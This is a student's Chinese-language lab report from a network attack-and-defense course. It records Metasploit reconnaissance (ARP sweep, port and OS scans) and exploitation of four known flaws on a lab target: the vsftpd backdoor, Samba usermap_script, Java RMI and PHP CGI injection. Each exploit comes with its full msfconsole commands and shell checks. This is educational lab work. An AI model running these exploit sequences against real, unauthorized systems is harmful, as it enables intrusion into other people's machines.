20222416 2024-2025-1 《网络与系统攻防技术》实验六实验报告
1.实验内容
本次实验使用的Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。
(1)前期渗透
①主机发现(可用Aux中的arp_sweep,search一下就可以use)
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
2.实验过程
靶机的IP:192.168.249.150
攻击机IP:192.168.249.129
2.1 前期渗透
2.1.1 主机发现
使用Aux中的arp_sweep
search arp_sweep
use 0
设置扫描的参数并启动
set RHOSTS 192.168.249.0/24
run
可以看到192.168.249.150就是靶机
2.1.2 端口扫描
使用Aux中的portscan/tcp
search portscan/tcp
use 0
set RHOST 192.168.249.150
set THREADS 5 // 多线程扫描
run
2.1.3 选做:系统扫描
nmap -O 192.168.249.150
可以看到Linux系统
2.2 Vsftpd源码包后门漏洞(21端口)
在kali中执行msfconsole 启动metasploit
use exploit/unix/ftp/vsftpd_234_backdoor //选择漏洞
set RHOST 192.168.249.150 //设置要攻击的机器IP(靶机IP)
exploit/run //开始攻击
利用成功
执行uname –a、 pwd、 id、whoami等命令验证
2.3 SambaMS-RPC Shell命令注入漏洞(端口139)
use exploit/multi/samba/usermap_script //选择漏洞
set RHOST 192.168.249.150 //设置要攻击的机器IP
exploit //开始攻击
利用成功 执行uname –a验证
2.4 Java RMI SERVER命令执行漏洞(1099端口)
首先查看1099端口是否打开
可以看到端口已经打开
然后在MSF中:
use exploit/multi/misc/java_rmi_server
show options //查看配置参数
set RHOST 192.168.249.150 //靶机IP
exploit
sessions -i id
shell //进入meterpreter时,使用whoami验证下
2.5 PHP CGI参数执行注入漏洞(80端口)
在kali中执行msfconsole,启动metasploit
msf > use exploit/multi/http/php_cgi_arg_injection //选择漏洞
set RHOST 192.168.249.150 //设置要攻击的机器IP
exploit //开始攻击
shell
whoami //开始验证
pwd
uname -a
3.问题及解决方案
- 问题1:不知道whoami的作用
- 问题1解决方案:经过查询得知,whoami命令设计用于显示与活动用户会话关联的当前用户名
4.学习感悟、思考等
这次实验使我掌握了metasploit的用法。msf实在是一个很好用的漏洞安全工具,我从这次前期扫描和进行四个漏洞的实践中熟悉了msf的使用方法,以及如何跟nmap配合使用;我也意识到了漏洞的危险性,这让我更加深刻地认识到了网络与系统安全的重要性。